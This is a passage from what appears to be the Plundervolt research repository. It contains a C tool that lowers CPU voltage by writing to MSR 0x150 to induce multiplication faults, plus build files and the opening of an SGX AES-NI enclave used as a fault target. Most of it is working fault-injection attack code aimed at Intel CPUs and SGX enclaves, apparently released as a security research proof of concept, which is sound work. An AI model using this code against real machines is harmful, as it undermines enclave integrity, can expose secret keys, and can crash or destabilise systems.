├── README.md
├── faulting_multiplications
    ├── Makefile
    └── operation.c
├── sgx_aes_ni
    ├── Enclave
    │   ├── Makefile
    │   ├── encl.config.xml
    │   ├── encl.cpp
    │   ├── encl.edl
    │   ├── private_key.pem
    │   └── public_key.pem
    ├── Makefile
    ├── dfa-aes-master
    │   ├── LICENSE
    │   ├── README.md
    │   ├── analysis
    │   │   ├── dfa
    │   │   ├── dfa.cpp
    │   │   ├── dfa.hpp
    │   │   ├── keys-0.csv
    │   │   ├── makefile
    │   │   └── tables.hpp
    │   ├── examples
    │   │   ├── dfa
    │   │   ├── input-1.csv
    │   │   ├── input-2.csv
    │   │   ├── keys-0.csv
    │   │   └── kit.csv
    │   └── simulator
    │   │   ├── aes.py
    │   │   └── inject.py
    ├── find_key_from_differential_fault_analysis.sh
    └── main.c
├── sgx_crt_rsa
    ├── Enclave
    │   ├── Makefile
    │   ├── encl.c
    │   ├── encl.config.xml
    │   └── encl.edl
    ├── Evaluation
    │   └── eval.py
    ├── Makefile
    ├── README.md
    └── main.c
├── sgx_launch_enclave_bypass
    ├── Enclave
    │   ├── Makefile
    │   ├── encl.config.xml
    │   ├── encl.cpp
    │   ├── encl.edl
    │   └── ref_le.h
    ├── Makefile
    ├── README.md
    └── main.c
├── sgx_struct_array_index
    ├── Enclave
    │   ├── Makefile
    │   ├── encl.config.xml
    │   ├── encl.cpp
    │   └── encl.edl
    ├── Makefile
    ├── README.md
    └── main.c
└── utils
    ├── 0x198_read_msr.sh
    ├── Makefile
    ├── find_crash_point.sh
    ├── keeping_tab
        ├── frequencies.txt
        └── last_frequency_tested
    ├── read_voltage.c
    ├── set_freq.sh
    └── undervolt.c


/README.md:
--------------------------------------------------------------------------------
 1 | # Plundervolt 
 2 | 
 3 | **NOTE:** This repo is currently a bit preliminary, we will update the examples and documentation over the coming days/weeks. 
 4 | 
 5 | Current (known) problems include:
 6 | 
 7 |  * Lack of documentation overall
 8 |  * The SGX code (AES) partially depends on sgx-step (https://github.com/jovanbulck/sgx-step) - we'll clean this up and add documentation
 9 |  
10 | 


--------------------------------------------------------------------------------
/faulting_multiplications/Makefile:
--------------------------------------------------------------------------------
 1 | CFLAGS =  -Wall -O0
 2 | LFLAGS = -lncurses
 3 | 
 4 | all: operation 
 5 | 
 6 | operation: operation.o
 7 | 	gcc $(CFLAGS) -o operation operation.o -lpthread $(LFLAGS)
 8 | 
 9 | operation.o: operation.c
10 | 	gcc $(CFLAGS) -c -o operation.o operation.c -mrdrnd
11 | 
12 | 
13 | clean:
14 | 	rm *.o
15 | 


--------------------------------------------------------------------------------
/faulting_multiplications/operation.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <fcntl.h>
  3 | #include <curses.h>
  4 | #include <immintrin.h>
  5 | #include <limits.h>
  6 | #include <pthread.h>
  7 | #include <sched.h>
  8 | #include <stdint.h>
  9 | #include <stdio.h>
 10 | #include <stdlib.h>
 11 | #include <string.h>
 12 | #include <time.h>
 13 | #include <unistd.h>
 14 | #include <x86intrin.h>
 15 | 
 16 | int verbose=1;
 17 | int fd;
 18 | int faulty_result_found=0;
 19 | int undervolting_finished=0;
 20 | uint64_t plane0_zero;
 21 | uint64_t plane2_zero;
 22 | 
 23 | typedef struct calculation_info_t
 24 | {
 25 | 	char max_or_fixed_op1;
 26 | 	char max_or_fixed_op2;
 27 | 	uint64_t operand1;
 28 | 	uint64_t operand2;
 29 | 	uint64_t operand1_min;
 30 | 	uint64_t operand2_min;
 31 | 	uint64_t correct_a;
 32 | 	uint64_t correct_b;
 33 | 	uint64_t iterations_performed;
 34 | 	int thread_number;
 35 | } calculation_info;
 36 | 
 37 | typedef struct undervoltage_info_t
 38 | {
 39 | 	int start_undervoltage;
 40 | 	int end_undervoltage;
 41 | 	int stop_after_x_drops;
 42 | 	int voltage_steps;
 43 | 	int voltage;
 44 | } undervoltage_info;
 45 | 
 46 | 
 47 | uint64_t wrmsr_value(int64_t val,uint64_t plane)
 48 | {
 49 | 	// -0.5 to deal with rounding issues
 50 | 	val=(val*1.024)-0.5;
 51 | 	val=0xFFE00000&((val&0xFFF)<<21);
 52 | 	val=val|0x8000001100000000;
 53 | 	val=val|(plane<<40);
 54 | 	return (uint64_t)val;
 55 | }
 56 | 
 57 | void voltage_change(int fd, uint64_t val)
 58 | {
 59 | 	pwrite(fd,&val,sizeof(val),0x150);
 60 | }
 61 | 
 62 | void reset_voltage()
 63 | {
 64 | 	////////////////////
 65 | 	// return voltage //
 66 | 	////////////////////
 67 | 	voltage_change(fd,plane0_zero);
 68 | 	voltage_change(fd,plane2_zero);
 69 | 	if (verbose)
 70 | 		printf("\r\nVoltage reset\r\n");
 71 | }
 72 | 
 73 | void *undervolt_it(void *input)
 74 | {
 75 | 	int s ;
 76 | 	cpu_set_t cpuset;
 77 | 	pthread_t thread;
 78 | 	thread = pthread_self();
 79 | 	 
 80 | 	 
 81 | 	CPU_ZERO(&cpuset);
 82 | 	/* Set affinity mask to CPUs 0  */
 83 | 	CPU_SET(0, &cpuset);
 84 | 
 85 | 	s = pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 86 | 	if (s != 0) 
 87 |   	{
 88 | 		printf("pthread set affinity error\r\n");
 89 | 	}
 90 | 	 
 91 | 	undervoltage_info *ui=(undervoltage_info*)input;
 92 | 	ui->voltage=ui->start_undervoltage;
 93 | 	int milli_seconds=2000000;
 94 | 	int counter=0;
 95 | 	while ( faulty_result_found==0 
 96 | 	&& ( ui->voltage > ui->end_undervoltage ||  ui->stop_after_x_drops>counter))
 97 | 	{
 98 | 		if (verbose)
 99 | 			printf("Undervolting: %i\n",ui->voltage);
100 | 		counter++;
101 | 		
102 | 		voltage_change(fd,wrmsr_value(ui->voltage,0));
103 | 		voltage_change(fd,wrmsr_value(ui->voltage,2));
104 | 		clock_t start_time =clock();
105 | 		while ((clock()< start_time+milli_seconds) && faulty_result_found==0)
106 | 		{
107 | 			;
108 | 		}
109 | 		ui->voltage=ui->voltage - ui->voltage_steps;
110 | 	}
111 | 	reset_voltage(); 
112 | 	undervolting_finished=1;
113 | 	return NULL;
114 | }
115 | 
116 | 
117 | void *multiply_it(void *input)
118 | {
119 | 	calculation_info *ci=(calculation_info*)input;
120 | 	uint64_t iterations=ci->iterations_performed;
121 | 	uint64_t max1=ci->operand1;
122 | 	uint64_t max2=ci->operand2;
123 | 	uint64_t min1=ci->operand1_min;
124 | 	uint64_t min2=ci->operand2_min;
125 | 	unsigned int one,two;
126 | 	
127 | 	while (faulty_result_found==0 && undervolting_finished==0)
128 | 	{
129 | 		ci->iterations_performed=0;
130 | 		if (ci->max_or_fixed_op1=='M')
131 | 		{
132 | 			__builtin_ia32_rdrand32_step(&one);
133 | 			ci->operand1=one % (max1 - min1) + min1;
134 | 		}
135 | 		if (ci->max_or_fixed_op2=='M')
136 | 		{
137 | 			__builtin_ia32_rdrand32_step(&two);
138 | 			ci->operand2=(two % (max2-min2)) + 1+min2 ;
139 | 		}
140 | 		do
141 | 		{
142 | 			ci->iterations_performed++;
143 | 			ci->correct_a = ci->operand1 * ci->operand2;
144 | 			ci->correct_b = ci->operand1 * ci->operand2;
145 | 		} while (ci->correct_a==ci->correct_b && 
146 |                          ci->iterations_performed<iterations && 
147 | 			 faulty_result_found==0 &&
148 | 			 undervolting_finished==0);
149 | 	
150 | 		if (ci->correct_a!=ci->correct_b && faulty_result_found==0)
151 | 		{
152 | 			faulty_result_found=1;
153 | 		}
154 | 	}
155 | 	return NULL;
156 | }
157 | 
158 | 
159 | void usage(const char* program)
160 | {
161 | 	printf("So many options - so little time:\n\n");
162 | 	printf("\t -i #           \t iterations\n");
163 | 	printf("\t -s #           \t start voltage\n");
164 | 	printf("\t -e #           \t end voltage\n");
165 | 	printf("\t -X #           \t Stop after x drops\n");
166 | 	printf("\t -1 0x#         \t operand1\n");
167 | 	printf("\t -2 0x#         \t operand2\n");
168 | 	printf("\t -t #           \t number of threads - default=1\n");
169 | 	printf("\t -v #           \t voltage_steps\n");
170 | 	printf("\t -z fixed | max \t fixed|max (what is operand 1 - default=fixed)\n");
171 | 	printf("\t -x fixed | max \t fixed|max (what is operand 2 - default=fixed)\n");
172 | 	printf("\t -q #           \t operand 1 minimum - default=0\n");
173 | 	printf("\t -w #           \t operand 2 minimum - default=0\n");
174 | 	printf("\t -S             \t Silent mode - default=verbose\n");
175 | 	printf("\t -M             \t Multiply only (no undervolting)\n");
176 | 	printf("\t -h             \t display this Help\n");
177 | 
178 | }
179 | int main (int argc, char* argv[])
180 | {
181 | 	const char* program=argv[0];
182 | 	if (argc < 5 )
183 | 	{
184 | 		usage(program);
185 | 		return -1;
186 | 	}
187 | 
188 | 	fd = open("/dev/cpu/0/msr", O_WRONLY);
189 | 	if(fd == -1)
190 | 	{
191 | 		printf("Could not open /dev/cpu/0/msr\n");
192 | 		return -1;
193 | 	}
194 | 	uint64_t iterations = 1000;
195 | 	uint64_t operand1=0, operand2=0;
196 | 	int64_t start_undervoltage=0,end_undervoltage=0;
197 | 	int stop_after_x_drops=0;
198 | 	int voltage_steps=1;
199 | 	char max_or_fixed_op1='F', max_or_fixed_op2='F';
200 | 	uint64_t operand1_min=0,operand2_min=0;
201 | 	int number_of_threads=1;
202 | 	int multiply_only=0;
203 | 	int opt=0;
204 | 
205 |     while((opt = getopt(argc, argv, ":e:i:s:v:t:1:2:q:w:X:z:x:SMCh")) != -1)  
206 |     {  
207 |         switch(opt)  
208 |         {  
209 | 	    case '1':
210 | 		operand1=strtol(optarg,NULL,16);
211 | 		break;
212 | 	    case '2':
213 | 		operand2=strtol(optarg,NULL,16);
214 | 		break;
215 |             case 'z':
216 | 		if (strcmp(optarg,"fixed")==0)
217 | 			max_or_fixed_op1='F';
218 | 		else if (strcmp(optarg,"max")==0)
219 | 			max_or_fixed_op1='M';
220 | 		else
221 | 		{
222 | 			printf ("Error setting operand1 to be fixed or max value\n");
223 | 			return -1;
224 | 		}
225 |                 break;  
226 |             case 'x':
227 | 		if (strcmp(optarg,"fixed")==0)
228 | 			max_or_fixed_op2='F';
229 | 		else if (strcmp(optarg,"max")==0)
230 | 			max_or_fixed_op2='M';
231 | 		else
232 | 		{
233 | 			printf ("Error setting operand2 to be fixed or max value\n");
234 | 			return -1;
235 | 		}
236 |                 break;  
237 | 	    case 'i':
238 | 	        iterations = strtol(optarg,NULL,10);
239 | 		break;
240 | 	    case 'h':
241 | 	        usage(program);
242 | 		return -1;
243 |             case 's':  
244 | 		start_undervoltage=strtol(optarg,NULL,10);
245 |                 break;  
246 |             case 'e':  
247 | 		end_undervoltage=strtol(optarg,NULL,10);
248 |                 break;  
249 |             case 'q':  
250 | 		operand1_min=strtol(optarg,NULL,16);
251 |                 break;  
252 |             case 'w':  
253 | 		operand2_min=strtol(optarg,NULL,16);
254 |                 break;  
255 |             case 'v':  
256 | 		voltage_steps=strtol(optarg,NULL,10);
257 |                 break;  
258 |             case 't':  
259 | 		number_of_threads=strtol(optarg,NULL,10);
260 |                 break;  
261 |             case 'X':  
262 | 		stop_after_x_drops=strtol(optarg,NULL,10);
263 |                 break;  
264 |             case 'S':  
265 | 		verbose=0;
266 |                 break;  
267 | 	    case 'M':
268 | 		multiply_only=1;
269 | 		break;
270 |             case ':':  
271 |                 printf("option needs a value\n");  
272 |                 break;  
273 |             case '?':  
274 |                 printf("unknown option: %c\n", optopt); 
275 |                 break;  
276 |         }  
277 |     }  
278 |     // optind is for the extra arguments 
279 |     // which are not parsed 
280 |     	for(; optind < argc; (optind++))
281 | 	{      
282 |         	printf("extra arguments: %s\n", argv[optind]);  
283 | 		usage(program);
284 | 		return -1;
285 |     	} 
286 | 	if (multiply_only==0 && start_undervoltage==0)
287 | 	{
288 | 		printf ("Error: start voltage must be set\n");
289 | 		return -1;
290 | 	}
291 | 	if (multiply_only==0 && end_undervoltage==0 && stop_after_x_drops==0)
292 | 	{
293 | 		printf ("Error: end voltage or end after x drops must be set.\n");
294 | 		return -1;
295 | 	}
296 | 	if (number_of_threads>0 && (operand1==0 || operand2==0))
297 | 	{
298 | 		printf ("Error: operand1 and operand2 must be set.\n");
299 | 		return -1;
300 | 	}
301 | 	if (verbose)
302 | 	{
303 | 		printf("\r\nSummary\n");
304 | 		printf("\r-------------------------------------------------\n");
305 | 		printf("\rIterations:          %li\n",iterations);
306 | 		printf("\rStart Voltage:       %li\n",start_undervoltage);
307 | 		printf("\rEnd Voltage:         %li\n",end_undervoltage);
308 | 		printf("\rStop after x drops:  %i\n",stop_after_x_drops);
309 | 		printf("\rVoltage steps:       %i\n",voltage_steps);
310 | 		printf("\rThreads:             %i\n",number_of_threads);
311 | 		printf("\rOperand1:            0x%016lx\n",operand1);
312 | 		printf("\rOperand2:            0x%016lx\n",operand2);
313 | 		printf("\rOperand1 is:         %s\n",max_or_fixed_op1=='M'?"maximum":"fixed value");
314 | 		printf("\rOperand2 is:         %s\n",max_or_fixed_op2=='M'?"maximum":"fixed value");
315 | 		printf("\rOperand1 min is:     0x%016lx\n",operand1_min);
316 | 		printf("\rOperand2 min is:     0x%016lx\n",operand2_min);
317 | 		printf("\rMultiply only:	     %s\n",multiply_only==1?"Yes":"No");
318 | 	}
319 | 	plane0_zero = wrmsr_value(0,0);
320 | 	plane2_zero = wrmsr_value(0,2);
321 | 
322 | 	pthread_t* my_calculation_thread=malloc(sizeof(pthread_t)*number_of_threads);
323 | 	calculation_info* calculation_data=malloc(sizeof(calculation_info)*number_of_threads);
324 | 
325 | 
326 | 	for (int i=0;i<number_of_threads;i++)
327 | 	{
328 | 		calculation_data[i].operand1=operand1;
329 | 		calculation_data[i].operand2=operand2;
330 | 		calculation_data[i].operand1_min=operand1_min;
331 | 		calculation_data[i].operand2_min=operand2_min;
332 | 		calculation_data[i].max_or_fixed_op1=max_or_fixed_op1;
333 | 		calculation_data[i].max_or_fixed_op2=max_or_fixed_op2;
334 | 		calculation_data[i].correct_a=0;
335 | 		calculation_data[i].correct_b=0;
336 | 		calculation_data[i].iterations_performed=iterations;
337 | 		calculation_data[i].thread_number=i;
338 | 		pthread_create(&my_calculation_thread[i], NULL, multiply_it, &calculation_data[i]);
339 | 	}
340 | 	
341 | 	undervoltage_info undervoltage_data;
342 | 	undervoltage_data.start_undervoltage=start_undervoltage;
343 | 	undervoltage_data.end_undervoltage=end_undervoltage;
344 | 	undervoltage_data.stop_after_x_drops=stop_after_x_drops;
345 | 	undervoltage_data.voltage_steps=voltage_steps;
346 | 
347 | 	if (multiply_only==0)
348 | 	{
349 | 		pthread_t my_undervolting_thread;
350 | 		pthread_create(&my_undervolting_thread,NULL,undervolt_it,&undervoltage_data);
351 | 		pthread_join(my_undervolting_thread, NULL);
352 | 	}
353 | 
354 | 	for (int i=0;i<number_of_threads;i++)
355 | 	{
356 |     		pthread_join(my_calculation_thread[i], NULL);
357 | 	}
358 | 
359 | 	for (int i=0;i<number_of_threads;i++)
360 | 	{
361 | 		if (calculation_data[i].correct_a!=calculation_data[i].correct_b)
362 | 		{
363 | 			uint64_t correct=calculation_data[i].operand1*calculation_data[i].operand2;
364 | 			printf("\n------   CALCULATION ERROR DETECTED   ------\n");
365 | 			printf(" > Iterations  \t : %08li\n"  , calculation_data[i].iterations_performed);
366 | 			printf(" > Operand 1   \t : %016lx\n" , calculation_data[i].operand1);
367 | 			printf(" > Operand 2   \t : %016lx\n" , calculation_data[i].operand2);
368 | 			printf(" > Correct     \t : %016lx\n" , calculation_data[i].operand1*calculation_data[i].operand2);
369 | 			if (correct!=calculation_data[i].correct_a)
370 | 				printf( " > Result      \t : %016lx\n" , calculation_data[i].correct_a);
371 | 			if (correct!=calculation_data[i].correct_b)
372 | 				printf( " > Result      \t : %016lx\n" , calculation_data[i].correct_b);
373 | 			printf( " > xor result  \t : %016lx\n" , calculation_data[i].correct_a^calculation_data[i].correct_b);
374 | 			printf( " > undervoltage\t : %i\n"     , undervoltage_data.voltage+1);
375 | 			char* cmd1="sensors | grep \"Core 0\" |awk '{print $3}'i | tr -d '\\n'";
376 | 			FILE *fp=popen(cmd1,"r");
377 | 			char temp[10];
378 | 			fgets(temp,10,fp);
379 | 			fclose(fp);
380 | 			printf( " > temperature \t : %s\n",temp);
381 | 			char* cmd2="cat /proc/cpuinfo | grep MHz | head -n 1 | cut  -d ':' -f2| cut -d '.' -f1 | tr -d '\\n'";
382 | 			fp=popen(cmd2,"r");
383 | 			char freq[10];
384 | 			fgets(freq,10,fp);
385 | 			printf( " > Frequency   \t :%sMHz\n",freq);
386 | 			refresh();
387 | 			fclose(fp);	
388 | 		}
389 | 	}
390 | 	printf("Done.\n");
391 | 	getch();
392 |         return 0;
393 | }
394 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/Enclave/Makefile:
--------------------------------------------------------------------------------
  1 | C		  = gcc
  2 | AR		  = ar
  3 | LD		  = gcc
  4 | EDGER		  = sgx_edger8r
  5 | SIGNER		  = sgx_sign
  6 | LINUX_SGX       = ~/sgx-step-dpl/linux-sgx/common/inc
  7 | INCLUDE       += -I$(SGX_SDK)/include/ -I$(SGX_SDK)/include/tlibc  -I$(SGX_SDK)/include/ipp -Iinternal/
  8 | 
  9 | T_CFLAGS	  = $(CFLAGS) -maes -fvisibility=hidden -fpie -fstack-protector -g -Os -mavx2 -march=haswell -Wpsabi -maes -O0
 10 | U_CFLAGS	  = $(CFLAGS) -fvisibility=hidden -fpie -fstack-protector -g 
 11 | AR_FLAGS	  = rcs
 12 | OBJECTS		  = encl.o 
 13 | LIB_SGX_TRTS      = -lsgx_trts
 14 | LIB_SGX_TSERVICE  = -lsgx_tservice
 15 | 
 16 | ifeq ($(M32), 1)
 17 | 	T_CFLAGS += -m32 -msse2 -DM32=1 -static
 18 | 	U_CFLAGS += -m32 -msse2 -static
 19 | 	LD_FLAGS  = -m32 -static
 20 | else
 21 | 	LIB_SUFX  = 64
 22 | endif
 23 | 
 24 | ENCLAVE_LIBS      = $(LIB_SGX_TRTS)
 25 | ENCLAVE_LIB_PARTS = -lsgx_tstdc -lsgx_tcrypto $(LIB_SGX_TSERVICE)
 26 | ENCLAVE	          = encl
 27 | PRIVATE_KEY       = private_key.pem
 28 | PUBLIC_KEY        = public_key.pem
 29 | KEY_SIZE          = 3072
 30 | ENCLAVE_EDL       = $(ENCLAVE).edl
 31 | ENCLAVE_CONFIG    = $(ENCLAVE).config.xml
 32 | OUTPUT_T          = $(ENCLAVE).so
 33 | OUTPUT_T_UNSIG    = $(ENCLAVE).unsigned.so
 34 | OUTPUT_U          = lib$(ENCLAVE)_proxy.a
 35 | LIB_DIRS          = -L $(SGX_SDK)/lib$(LIB_SUFX)/
 36 | LD_FLAGS         += -Wl,--no-undefined -nostdlib -nodefaultlibs -nostartfiles \
 37 |                     -Wl,--whole-archive -Wl,--start-group $(ENCLAVE_LIBS) -Wl,--end-group \
 38 |                     -Wl,--no-whole-archive -Wl,--start-group $(ENCLAVE_LIB_PARTS) -Wl,--end-group \
 39 |                     -Wl,-Bstatic -Wl,-Bsymbolic -Wl,--no-undefined \
 40 |                     -Wl,-pie,-eenclave_entry -Wl,--export-dynamic  \
 41 |                     -Wl,--defsym,__ImageBase=0 
 42 | TRUSTED_OBJECTS   = $(ENCLAVE)_t.o
 43 | UNTRUSTED_OBJECTS = $(ENCLAVE)_u.o 
 44 | TRUSTED_CODE      = $(ENCLAVE)_t.h $(ENCLAVE)_t.c
 45 | UNTRUSTED_CODE    = $(ENCLAVE)_u.h $(ENCLAVE)_u.c
 46 | 
 47 | #.SILENT:
 48 | all: $(OUTPUT_T) $(OUTPUT_U)
 49 | 
 50 | $(OUTPUT_T) : $(TRUSTED_OBJECTS) $(OBJECTS) $(PRIVATE_KEY)
 51 | 	echo "$(INDENT)[LD]  " $(OBJECTS) $(TRUSTED_OBJECTS) $(ENCLAVE_LIBS) $(ENCLAVE_LIBS_PARTS) $(OUTPUT_T_UNSIG)
 52 | 	$(LD) $(OBJECTS) $(TRUSTED_OBJECTS) $(LD_FLAGS) $(LIB_DIRS) -o $(OUTPUT_T_UNSIG) 
 53 | 	
 54 | 	echo "$(INDENT)[SGN]" $(OUTPUT_T_UNSIG)
 55 | 	$(SIGNER) sign -key $(PRIVATE_KEY) -enclave $(OUTPUT_T_UNSIG) -out $(OUTPUT_T) -config $(ENCLAVE_CONFIG) > /dev/null 2> /dev/null
 56 | 
 57 | $(OUTPUT_U) : $(UNTRUSTED_OBJECTS) 
 58 | 	echo "$(INDENT)[AR]  " $(OUTPUT_U)
 59 | 	$(AR) $(AR_FLAGS) $(OUTPUT_U) $(UNTRUSTED_OBJECTS) 
 60 | 	
 61 | %_t.o : $(subst .o,.c,$@) edger
 62 | 	echo "$(INDENT)[CC] " $(subst .o,.c,$@) "(trusted edge)"
 63 | 	touch $(subst .o,.c,$@)
 64 | 	$(CC) -c $(INCLUDE) $(T_CFLAGS) $(subst .o,.c,$@)
 65 | 
 66 | %_u.o : $(subst .o,.c,$@) edger
 67 | 	echo "$(INDENT)[CC] " $(subst .o,.c,$@) "(untrusted edge)"
 68 | 	touch $(subst .o,.c,$@)
 69 | 	$(CC) -c $(INCLUDE) $(U_CFLAGS) $(subst .o,.c,$@)
 70 | 
 71 | %.o : %.c edger
 72 | 	echo "$(INDENT)[CC] " $< "(core)"
 73 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $<
 74 | 
 75 | %.o : %.cpp
 76 | 	echo "$(INDENT)[CC] " $< "(core)"
 77 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $<
 78 | 
 79 | 
 80 | %.o : %.S
 81 | 	echo "$(INDENT)[AS] " $< "(core)"
 82 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $< -o $@
 83 | 
 84 | asm.s: build_asm.py
 85 | 	./build_asm.py
 86 | 
 87 | edger: $(ENCLAVE).edl
 88 | 	echo "$(INDENT)[GEN]" $(EDGER) $(ENCLAVE_EDL)
 89 | 	$(EDGER) $(ENCLAVE_EDL)
 90 | 	
 91 | .PHONY: force_check
 92 | force_check:
 93 | 	true
 94 | 
 95 | .PHONY: scrub
 96 | scrub: 
 97 | 	echo "$(INDENT)[RM]  " $(PRIVATE_KEY) $(PUBLIC_KEY)
 98 | 	$(RM) $(PRIVATE_KEY) $(PUBLIC_KEY)
 99 | 
100 | $(PRIVATE_KEY): 
101 | 	echo "$(INDENT)[GEN] $(PRIVATE_KEY) ($(KEY_SIZE) bits)"
102 | 
103 | 	# generate 3072 bit private RSA key
104 | 	openssl genrsa -out $(PRIVATE_KEY) -3 $(KEY_SIZE)
105 | 	
106 | 	echo "$(INDENT)[EXT] $(PUBLIC_KEY)"
107 | 	# extract public key
108 | 	openssl rsa -in $(PRIVATE_KEY) -pubout -out $(PUBLIC_KEY) 
109 | 	
110 | 	# sign enclave
111 | 	#sgx_sign sign -key private_key.pem -enclave Enclave/encl.so -out encl.signed.so
112 | 	
113 | .PHONY: clean
114 | clean:
115 | 	echo "$(INDENT)[RM]" $(OBJECTS) $(OUTPUT_T_UNSIG) $(OUTPUT_T) $(OUTPUT_U)
116 | 	$(RM) $(OBJECTS) $(OUTPUT_T_UNSIG) $(OUTPUT_T) $(OUTPUT_U)
117 | 	echo "$(INDENT)[RM]" $(TRUSTED_OBJECTS) $(UNTRUSTED_OBJECTS) $(TRUSTED_CODE) $(UNTRUSTED_CODE)
118 | 	$(RM) $(TRUSTED_OBJECTS) $(UNTRUSTED_OBJECTS) $(TRUSTED_CODE) $(UNTRUSTED_CODE)
119 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/Enclave/encl.config.xml:
--------------------------------------------------------------------------------
 1 | <!-- Please refer to User's Guide for the explanation of each field -->
 2 | <EnclaveConfiguration>
 3 |   <ProdID>0</ProdID>
 4 |   <ISVSVN>0</ISVSVN>
 5 |   <StackMaxSize>0x40000</StackMaxSize>
 6 |   <HeapMaxSize>0x100000</HeapMaxSize>
 7 |   <TCSNum>1</TCSNum>
 8 |   <TCSPolicy>1</TCSPolicy>
 9 |   <DisableDebug>0</DisableDebug>
10 | </EnclaveConfiguration>
11 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/Enclave/encl.cpp:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <string.h>
  3 | #include <time.h>
  4 | #include <stdlib.h>
  5 | #include <stdint.h>
  6 | #include <smmintrin.h>
  7 | #include <wmmintrin.h>
  8 | #include <immintrin.h>
  9 | #include <immintrin.h>
 10 | #include "sgx_tcrypto.h"
 11 | #include "sgx_trts.h"
 12 | #include "encl_t.h" // for ocall
 13 | 
 14 | #define BUFLEN 2048
 15 | 
 16 | uint64_t plane0_return;
 17 | uint64_t plane2_return;
 18 | uint64_t plane0_offset;
 19 | uint64_t plane2_offset;
 20 | 
 21 | typedef unsigned int u32;
 22 | 
 23 | // The in-enclave secret key
 24 | static uint8_t key[16] = {0x0,0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8,0x9,0xa,0xb,0xc,0xd,0xe,0xf};
 25 | static __m128i key_schedule[20]; // the expanded key (local for thread safety)
 26 | 
 27 | #define AES_128_key_exp(k, rcon) aes_128_key_expansion(k, _mm_aeskeygenassist_si128(k, rcon))
 28 | 
 29 | #define DO_ENC_BLOCK(m, k)                  \
 30 | 	do                                      \
 31 | 	{                                       \
 32 | 		m = _mm_xor_si128(m, k[0]);         \
 33 | 		m = _mm_aesenc_si128(m, k[1]);      \
 34 | 		m = _mm_aesenc_si128(m, k[2]);      \
 35 | 		m = _mm_aesenc_si128(m, k[3]);      \
 36 | 		m = _mm_aesenc_si128(m, k[4]);      \
 37 | 		m = _mm_aesenc_si128(m, k[5]);      \
 38 | 		m = _mm_aesenc_si128(m, k[6]);      \
 39 | 		m = _mm_aesenc_si128(m, k[7]);      \
 40 | 		m = _mm_aesenc_si128(m, k[8]);      \
 41 | 		m = _mm_aesenc_si128(m, k[9]);      \
 42 | 		m = _mm_aesenclast_si128(m, k[10]); \
 43 | 	} while (0)
 44 | 
 45 | static __m128i aes_128_key_expansion(__m128i key, __m128i keygened)
 46 | {
 47 | 	keygened = _mm_shuffle_epi32(keygened, _MM_SHUFFLE(3, 3, 3, 3));
 48 | 	key = _mm_xor_si128(key, _mm_slli_si128(key, 4));
 49 | 	key = _mm_xor_si128(key, _mm_slli_si128(key, 4));
 50 | 	key = _mm_xor_si128(key, _mm_slli_si128(key, 4));
 51 | 	return _mm_xor_si128(key, keygened);
 52 | }
 53 | 
 54 | static void aes128_load_key(uint8_t *enc_key, __m128i *key_schedule)
 55 | {
 56 | 	key_schedule[0] = _mm_loadu_si128((const __m128i *)enc_key);
 57 | 	key_schedule[1] = AES_128_key_exp(key_schedule[0], 0x01);
 58 | 	key_schedule[2] = AES_128_key_exp(key_schedule[1], 0x02);
 59 | 	key_schedule[3] = AES_128_key_exp(key_schedule[2], 0x04);
 60 | 	key_schedule[4] = AES_128_key_exp(key_schedule[3], 0x08);
 61 | 	key_schedule[5] = AES_128_key_exp(key_schedule[4], 0x10);
 62 | 	key_schedule[6] = AES_128_key_exp(key_schedule[5], 0x20);
 63 | 	key_schedule[7] = AES_128_key_exp(key_schedule[6], 0x40);
 64 | 	key_schedule[8] = AES_128_key_exp(key_schedule[7], 0x80);
 65 | 	key_schedule[9] = AES_128_key_exp(key_schedule[8], 0x1B);
 66 | 	key_schedule[10] = AES_128_key_exp(key_schedule[9], 0x36);
 67 | 
 68 | 	// generate decryption keys in reverse order.
 69 | 	// k[10] is shared by last encryption and first decryption rounds
 70 | 	// k[0] is shared by first encryption round and last decryption round (and is the original user key)
 71 | 	// For some implementation reasons, decryption key schedule is NOT the encryption key schedule in reverse order
 72 | 	key_schedule[11] = _mm_aesimc_si128(key_schedule[9]);
 73 | 	key_schedule[12] = _mm_aesimc_si128(key_schedule[8]);
 74 | 	key_schedule[13] = _mm_aesimc_si128(key_schedule[7]);
 75 | 	key_schedule[14] = _mm_aesimc_si128(key_schedule[6]);
 76 | 	key_schedule[15] = _mm_aesimc_si128(key_schedule[5]);
 77 | 	key_schedule[16] = _mm_aesimc_si128(key_schedule[4]);
 78 | 	key_schedule[17] = _mm_aesimc_si128(key_schedule[3]);
 79 | 	key_schedule[18] = _mm_aesimc_si128(key_schedule[2]);
 80 | 	key_schedule[19] = _mm_aesimc_si128(key_schedule[1]);
 81 | }
 82 | static __m128i aes128_enc(__m128i plaintext)
 83 | {
 84 | 	uint8_t pt[16] = {0};
 85 | 	uint8_t ct[16] = {0};
 86 | 	__m128i m = plaintext;
 87 | 
 88 | 	DO_ENC_BLOCK(m, key_schedule);
 89 | 
 90 | 	_mm_storeu_si128((__m128i *)ct, m);
 91 | 
 92 | 	return m;
 93 | }
 94 | 
 95 | static inline u32 rol(u32 x, int n)
 96 | {
 97 | 	__asm__(
 98 | 		"roll %%cl,%0"
 99 | 		: "=r"(x)
100 | 		: "0"(x), "c"(n));
101 | 	return x;
102 | }
103 | 
104 | bool vec_equal(__m256i a, __m256i b)
105 | {
106 | 	__m256i pcmp = _mm256_cmpeq_epi32(a, b); // epi8 is fine too
107 | 	unsigned bitmask = _mm256_movemask_epi8(pcmp);
108 | 	return (bitmask == 0xffffffffU);
109 | }
110 | 
111 | bool vec_equal_128(__m128i a, __m128i b)
112 | {
113 | 	__m128i pcmp = _mm_cmpeq_epi32(a, b); // epi8 is fine too
114 | 	unsigned bitmask = _mm_movemask_epi8(pcmp);
115 | 	return (bitmask == 0xffffU);
116 | }
117 | 
118 | volatile uint64_t not_used = 0xdead;
119 | volatile __m256i var;
120 | 
121 | static void eprintf(const char *fmt, ...)
122 | {
123 | 	char buf[1000] = {'\0'};
124 | 	va_list ap;
125 | 	va_start(ap, fmt);
126 | 	vsnprintf(buf, 1000, fmt, ap);
